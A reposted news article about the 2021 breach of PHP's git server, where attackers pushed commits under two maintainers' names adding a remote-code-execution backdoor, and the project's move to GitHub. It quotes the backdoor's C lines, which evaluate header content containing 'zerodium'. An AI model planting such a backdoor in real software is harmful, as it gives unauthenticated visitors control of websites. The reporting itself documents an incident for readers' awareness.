viralamo

Menu
  • Technology
  • Science
  • Money
  • Culturs
  • Trending
  • Video

Subscribe To Our Website To Receive The Last Stories

Join Us Now For Free
Home
Technology
Hackers backdoor PHP source code after breaching internal git server
Technology

Hackers backdoor PHP source code after breaching internal git server

29/03/2021

A cartoon door leads to a wall of computer code.

A hacker compromised the server used to distribute the PHP programming language and added a backdoor to source code that would have made websites vulnerable to complete takeover, members of the open source project said.

Two updates pushed to the PHP Git server over the weekend added a line that, if run by a PHP-powered website, would have allowed visitors with no authorization to execute code of their choice. The malicious commits here and here gave the code the code-injection capability to visitors who had the word “zerodium” in an HTTP header.

PHP.net hacked, code backdoored

The commits were made to the php-src repo under the account names of two well-known PHP developers, Rasmus Lerdorf and Nikita Popov. “We don’t yet know how exactly this happened, but everything points toward a compromise of the git.php.net server (rather than a compromise of an individual git account),” Popov wrote in a notice published on Sunday night.

In the aftermath of the compromise, Popov said that PHP maintainers have concluded that their standalone Git infrastructure is an unnecessary security risk. As a result, they will discontinue the git.php.net server and make GitHub the official source for PHP repositories. Going forward, all PHP source code changes will be made directly to GitHub rather than to git.php.net.

The malicious changes came to public attention no later than Sunday night by developers including Markus Staab, Jake Birchallf, and Michael Voříšek as they scrutinized a commit made on Saturday. The update, which purported to fix a typo, was made under an account that used Lerdorf’s name. Shortly after the first discovery, Voříšek spotted the second malicious commit, which was made under Popov’s account name. It purported to revert the previous typo fix.

Advertisement

Both commits added the same lines of code:

onvert_to_string(enc);
	if (strstr(Z_STRVAL_P(enc), "zerodium")) {
		zend_try {
			zend_eval_string(Z_STRVAL_P(enc)+8, NULL, "REMOVETHIS: sold to zerodium, mid 2017");

Zerodium is a broker that buys exploits from researchers and sells them to government agencies for use in investigations or other purposes. Why the commits referenced Zerodium is not clear. The company’s CEO, Chaouki Bekrar, said on Twitter Monday that Zerodium wasn’t involved.

“Cheers to the troll who put ‘Zerodium’ in today’s PHP git compromised commits,” he wrote. “Obviously, we have nothing to do with this. Likely, the researcher(s) who found this bug/exploit tried to sell it to many entities but none wanted to buy this crap, so they burned it for fun.

Cheers to the troll who put “Zerodium” in today’s PHP git compromised commits. Obviously, we have nothing to do with this.

Likely, the researcher(s) who found this bug/exploit tried to sell it to many entities but none wanted to buy this crap, so they burned it for fun 😃

— Chaouki Bekrar (@cBekrar) March 29, 2021

Bad karma

Prior to the compromise, The PHP Group handled all write access to the repository on their own git server http://git.php.net/ using what Popov called a “home-grown” system called Karma. It provided developers different levels of access privileges depending on previous contributions. GitHub, meanwhile, had been a mirror repository.

Now, the PHP Group is abandoning the self-hosted and managed git infrastructure and replacing it with GitHub. The change means that GitHub is now the “canonical” repository. The PHP Group will no longer use the Karma system. Instead, contributors will have to be part of the PHP organization on GitHub and must use two-factor authentication for accounts with the ability to make commits.

This weekend’s event isn’t the first time php.net servers have been breached with the intent of performing a supply chain attack. In early 2019, the widely used PHP Extension and Application Repository temporarily shut down most of the site after discovering that hackers replaced the main package manager with a malicious one. Group developers said that anyone who had downloaded the package manager in the past six months should get a new copy.

PHP runs an estimated 80 percent of websites. There are no reports of websites incorporating the malicious changes into their production environments.

The changes were likely made by people who wanted brag about their unauthorized access to the PHP Git server rather than those trying to actually backdoor websites that use PHP, said HD Moore, co-founder and CEO of network discovery platform Rumble.

“Sounds like the attackers are trolling Zerodium or trying to give the impression that the code was backdoored for much longer,” he told Ars. “Either way, I would be spending a lot of time going through previous commits if I had any security interest in PHP.”

Source link

Share
Tweet
Pinterest
Linkedin
Stumble
Google+
Email
Prev Article
Next Article

Related Articles

Trinamix’s molecular sensing lets smartphones assess the best cosmetics for your skin
Trinamix has created molecular sensing technology that lets you use …

Trinamix’s molecular sensing lets smartphones assess the best cosmetics for your skin

2020 will be a big year for online childcare — here are 7 startups to watch
TechCrunch ist Teil von Verizon Media. Klicken Sie auf ‘Ich …

Former Tesla president and Lyft COO Jon McNeill on what both companies have gotten right and wrong

Leave a Reply Cancel reply

Find us on Facebook

Related Posts

  • TechCrunch’s Favorite Things of 2019
    Goldman Sachs predicts brutal second quarter as …
    20/03/2020
  • Beat Saber is now an Oculus studio after Facebook acquisition
    Here’s a wrap of the main tech-related …
    21/03/2020
  • India’s HomeLane raises $30M to expand its one-stop-shop for interior design – TechCrunch
    India’s HomeLane raises $30M to expand its …
    23/12/2019
  • Researchers claim masks muffle speech, but not enough to impede speech recognition
    Stanford and Carnegie Mellon find race and …
    19/11/2020
  • eBay relaunches Motors app with AI and automation at its core
    eBay relaunches Motors app with AI and …
    12/12/2019

Popular Posts

  • Millions of web surfers are being targeted by a single malvertising group
    Millions of web surfers are being targeted …
    19/04/2021 0
  • Top 10 Averted Tragedies And Near-misses – …
    21/03/2021 0
  • 10 Images Of Easter Celebrations Worldwide – …
    22/03/2021 0
  • Top 10 People Who Were Thought To …
    22/03/2021 0
  • Judge grants class-action status to MacBook butterfly-keyboard suit
    Judge grants class-action status to MacBook butterfly-keyboard …
    22/03/2021 0

viralamo

Pages

  • Contact Us
  • Privacy Policy
Copyright © 2021 viralamo
Theme by MyThemeShop.com

Ad Blocker Detected

Our website is made possible by displaying online advertisements to our visitors. Please consider supporting us by disabling your ad blocker.

Refresh